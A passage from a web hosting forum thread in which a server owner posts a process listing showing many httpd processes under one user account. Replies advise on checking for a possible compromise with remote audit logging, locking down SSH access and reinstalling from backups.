    hussain 30005 0.0 0.0 56768 7908 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30013 0.0 0.0 57524 8236 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30062 0.1 0.0 56116 6960 ? S 2013 47:10 /usr/sbin/httpd
    hussain 30135 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    root 30177 20.7 0.2 154036 48760 ? S Jan07 184:15 /bin/bash /usr/
    hussain 30192 0.1 0.0 56116 6976 ? S 2013 43:15 /usr/sbin/httpd
    hussain 30210 0.0 0.0 57524 8248 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30236 0.0 0.0 57960 9396 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30238 0.9 0.0 56116 7444 ? S 2013 296:56 /usr/sbin/httpd
    hussain 30264 0.0 0.0 58248 9660 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30309 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30340 0.0 0.0 58248 9660 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30369 0.8 0.0 56116 7512 ? S 2013 256:04 /usr/sbin/httpd
    hussain 30392 0.0 0.0 57524 8196 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30406 0.0 0.0 57524 8188 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30423 0.0 0.0 58248 9660 ? S 2013 0:00 /usr/sbin/httpd
    nobody 30460 0.0 0.0 76728 4796 ? S 13:41 0:00 /usr/local/apac
    hussain 30480 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    nobody 30521 0.0 0.0 76728 4752 ? S 13:41 0:00 /usr/local/apac
    nobody 30526 0.0 0.0 76732 4764 ? S 13:41 0:00 /usr/local/apac
    hussain 30527 0.0 0.0 57236 8516 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30557 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30651 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30672 0.1 0.0 70344 12888 ? R 2013 45:54 /usr/sbin/httpd
    hussain 30725 0.0 0.0 71656 13128 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30731 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30750 0.0 0.0 71656 13128 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30769 0.0 0.0 71656 13128 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30798 0.0 0.0 57524 8248 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30882 0.0 0.0 57524 8248 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30937 0.0 0.0 71736 13196 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30963 0.0 0.0 57524 8244 ? S 2013 0:00 /usr/sbin/httpd
    hussain 30993 0.1 0.0 56116 7008 ? S 2013 43:08 /usr/sbin/httpd
    hussain 31016 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31018 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31020 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31029 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31081 0.0 0.0 59644 10752 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31083 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31085 0.0 0.0 59644 10752 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31097 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31099 0.0 0.0 59644 10756 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31101 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31183 0.0 0.0 71348 12836 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31186 0.8 0.0 56116 7540 ? S 2013 254:56 /usr/sbin/httpd
    root 31282 0.0 0.0 104484 4180 ? Ss 13:04 0:00 sshd: root@pts/
    hussain 31421 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31423 0.0 0.0 59644 10768 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31425 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31460 0.1 0.0 56116 7020 ? S 2013 44:46 /usr/sbin/httpd
    hussain 31505 0.0 0.0 70992 12432 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31633 0.8 0.0 56116 7520 ? S 2013 274:40 /usr/sbin/httpd
    hussain 31635 0.0 0.0 57808 9104 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31751 0.0 0.0 59644 10768 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31753 0.0 0.0 59644 10768 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31826 0.0 0.0 57212 8036 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31840 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31842 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31845 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31854 0.0 0.0 57316 8684 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31857 0.0 0.0 59644 10760 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31859 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31881 0.0 0.0 57580 8776 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31883 0.0 0.0 57580 8776 ? S 2013 0:00 /usr/sbin/httpd
    hussain 31885 0.0 0.0 57580 8776 ? S 2013 0:00 /usr/sbin/httpd
    root 31953 0.0 0.0 108332 1764 pts/0 Ss 13:04 0:00 -bash
    root 32051 0.0 0.0 66604 596 ? Ss 2013 1:20 /usr/sbin/sshd
    hussain 32057 0.0 0.0 57504 8812 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32061 0.0 0.0 59644 10748 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32063 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32066 0.0 0.0 59644 10768 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32073 0.0 0.0 57236 8572 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32121 0.0 0.0 57504 8812 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32135 0.0 0.0 59644 10752 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32137 0.0 0.0 59644 10756 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32139 0.0 0.0 59644 10756 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32155 0.0 0.0 59644 10764 ? S 2013 0:00 /usr/sbin/httpd
    root 32222 0.0 0.0 117320 1000 ? Ss 2013 0:30 crond
    root 32258 0.0 0.0 249860 5432 ? Sl 2013 1:53 /sbin/rsyslogd
    nobody 32408 0.0 0.0 76732 4756 ? S 13:42 0:00 /usr/local/apac
    nobody 32409 0.0 0.0 76596 4664 ? S 13:42 0:00 /usr/local/apac
    hussain 32426 0.0 0.0 57988 9392 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32429 0.1 0.0 56116 6984 ? S 2013 45:30 /usr/sbin/httpd
    hussain 32440 0.0 0.0 57988 9392 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32450 0.0 0.0 57540 6516 ? S 2013 0:00 /usr/sbin/httpd
    nobody 32452 0.0 0.0 76732 4796 ? S 13:42 0:00 /usr/local/apac
    nobody 32456 0.0 0.0 76596 4716 ? S 13:42 0:00 /usr/local/apac
    nobody 32492 0.0 0.0 76596 4732 ? S 13:42 0:00 /usr/local/apac
    hussain 32610 0.8 0.0 56116 7508 ? S 2013 278:00 /usr/sbin/httpd
    hussain 32672 0.1 0.0 70412 12928 ? S 2013 42:18 /usr/sbin/httpd
    hussain 32708 0.0 0.0 71520 12896 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32720 0.1 0.0 56116 7012 ? S 2013 47:39 /usr/sbin/httpd
    hussain 32744 0.0 0.0 57988 9392 ? S 2013 0:00 /usr/sbin/httpd
    hussain 32750 0.0 0.0 57988 9392 ? S 2013 0:00 /usr/sbin/httpd
    root@server [~]#

  22. #22
    I don't see anything suspicious. But don't take my word for granted. There are many ways to mask a process and show it as a legitimate one. I would investigate the hussain account alone. Do you have some kind of auditd or snoopy? If your server was really compromised, you could check the logs on your other server.

  23. #23
    StefanHost, what kind of snoopy are you talking about? I am a little bit confused. I have only one server, so how can I check on my other one?

  24. #24
    Join Date: Dec 2011 | Location: Montreal | Posts: 431
    If I were you, I wouldn't trust that system anymore. Like StefanHost said, don't take anything for granted. What I'd do first is lock down the server and permit access only to my IP (if root is compromised, maybe they installed a backdoor, so I can't trust the system anymore), and if I have backups, reinstall a clean OS, cPanel or whatever you have, and restore accounts from backup (if it exists); or you have to hire somebody to check. And second, don't post here in a public forum where anybody can read your actions.

    But this is just me.

    Regards
    George B. | ROWEBCA
    Web Hosting Services & Server Management
    Skype : rowebca

  25. #25
    Snoopy is a daemon (software) which runs in the background and logs everything that happens on the server; the logs are then transferred to a remote server, where you can check whether the server was really compromised. I guess you don't have anything like that, so it's quite impossible to tell whether the server was really compromised or not. However, even if you don't see a malicious process, that does not mean you don't have a backdoor. And that is in most cases (if the attacker knew what he was doing) impossible to remove. Your best option is to take the data from the hussain account (and any other account hosted with you), and then completely re-install the system. (Make sure you have all data twice.) Then, after you're done with the re-install, immediately install snoopy so you can have peace of mind. You could lock down the server as well, as Rowebca said: permit SSH & WHM logins only from your IP, so the attacker can't do any further damage. But if a malicious process is already active (masked as httpd), that won't help much. Once compromised, always compromised. The only solution is a re-install.
